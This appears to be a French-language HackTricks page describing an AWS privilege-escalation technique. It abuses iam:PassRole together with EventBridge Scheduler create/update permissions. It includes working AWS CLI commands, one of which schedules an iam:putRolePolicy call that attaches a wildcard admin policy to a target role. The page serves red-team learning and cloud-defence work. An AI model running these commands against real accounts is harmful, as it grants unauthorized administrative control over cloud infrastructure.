AWS - EventBridge Scheduler Privesc

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks

EventBridge Scheduler

Plus d’informations sur EventBridge Scheduler dans :

AWS - EventBridge Scheduler Enum

iam:PassRole, (scheduler:CreateSchedule | scheduler:UpdateSchedule)

Un attaquant disposant de ces permissions pourra create|update un scheduler et abuser des permissions du rĂŽle du scheduler qui lui est attachĂ© pour effectuer n’importe quelle action

Par exemple, il pourrait configurer la schedule pour invoquer une fonction Lambda qui est une action templatisée :

aws scheduler create-schedule \
--name MyLambdaSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:lambda:<region>:<account-id>:function:<LambdaFunctionName>",
"RoleArn": "arn:aws:iam::<account-id>:role/<RoleName>"
}'

En plus des actions de service prĂ©dĂ©finies, vous pouvez utiliser universal targets dans EventBridge Scheduler pour invoquer un large Ă©ventail d’opĂ©rations API pour de nombreux services AWS. Les universal targets offrent la flexibilitĂ© d’invoquer quasiment n’importe quelle API. Un exemple consiste Ă  utiliser universal targets pour ajouter “AdminAccessPolicy”, en utilisant un rĂŽle qui possĂšde la stratĂ©gie “putRolePolicy” :

aws scheduler create-schedule \
--name GrantAdminToTargetRoleSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy",
"RoleArn": "arn:aws:iam::<account-id>:role/RoleWithPutPolicy",
"Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}"
}'

Références

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks